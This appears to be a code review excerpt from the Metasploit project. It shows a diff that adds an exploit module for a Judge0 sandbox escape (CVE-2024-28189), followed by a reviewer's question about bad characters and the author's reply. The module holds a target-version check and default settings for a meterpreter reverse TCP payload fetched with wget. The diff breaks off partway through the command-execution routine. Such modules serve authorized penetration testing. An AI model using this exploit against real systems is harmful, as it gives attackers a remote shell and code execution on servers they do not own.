modules/exploits/linux/http/judge0_sandbox_escape_cve_2024_28189.rb

```diff
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Judge0 sandbox escape',
+        'Description' => %q{
+          Judge0 does not account for symlinks placed inside the sandbox directory,
+          which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
+        },
+        'Author' => [
+          'Tanto Security',    # Vulnerability discovery
+          'Takahiro Yokoyama'  # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-28185'],
+          ['CVE', '2024-28189'],
+          ['URL', 'https://tantosec.com/blog/judge0/'],
+        ],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET',
+                'FETCH_DELETE' => false
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-03-04',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(2358),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'version')
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200 && Rex::Version.new(res.body) <= Rex::Version.new('1.13.0')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'languages')
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    languages = JSON.parse(res.body)
+
+    if languages.any? { |row| row['id'] == 46 && row['name'].include?('Bash') } &&
+       languages.any? { |row| row['id'] == 73 && row['name'].include?('Rust') }
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd, _opts = {})
+    target = '/bin/rm'
+
+    cmd = cmd.gsub(/;/, "\n")
```

Comment:
Why not add ';' to the list of badchars so this is encoded?

Reply:
Thanks!  https://github.com/rapid7/metasploit-framework/pull/19584/commits/d923cf836a38b29df4be961cc42ec426288646b5 ref: https://github.com/judge0/judge0/blob/ad66f77b131dbbebf2b9ff8083dca9a68680b3e5/app/jobs/isolate_job.rb#L199